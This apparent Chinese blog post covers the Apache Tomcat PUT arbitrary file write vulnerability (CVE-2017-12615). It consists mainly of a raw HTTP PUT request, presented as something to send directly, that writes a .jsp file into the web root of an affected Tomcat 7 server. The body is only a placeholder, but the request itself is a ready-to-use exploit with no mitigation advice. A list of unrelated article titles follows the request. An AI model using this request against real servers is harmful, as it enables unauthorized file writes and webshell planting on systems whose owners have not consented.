Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
2024-09-20 20:45:55
Apache Tomcat 7.0.0~7.0.79
直接发送以下数据包即可在Web根目录写入shell:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.49.2:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
最新文章
- 30行代码让你理解angular依赖注入:angular 依赖注入原理
- (转) Deep Learning Resources
- java获取本机IP地址
- EXTJS 4.2 资料 控件GroupingGrid
- php中mysqli 处理查询结果集的几个方法
- java: Eclipse jsp tomcat 环境搭建(完整)
- 10个重要的Linux ps命令实战
- 18-UIKit(Core Animation、广播设计模式)
- c3p0连接池的使用
- docker~Dockerfile方式生成控制台和Api项目的镜像
- OpenTSDB-Querying or Reading Data
- jQuery应用操作之---网页选项卡(tabs)
- 怎样将Android手机弄死机?
- vscode在vue-cli中按照ESlint自动格式化代码
- mysql 案例~ 主从复制转化为级联复制
- LVS+keepalived+nginx+tomcat部署实现
- (转)PCM数据格式
- Intellij IDEA 热部署处理
- xml配置文件特殊符号的处理方法
- ajax等待(比较慢时)(显示图片)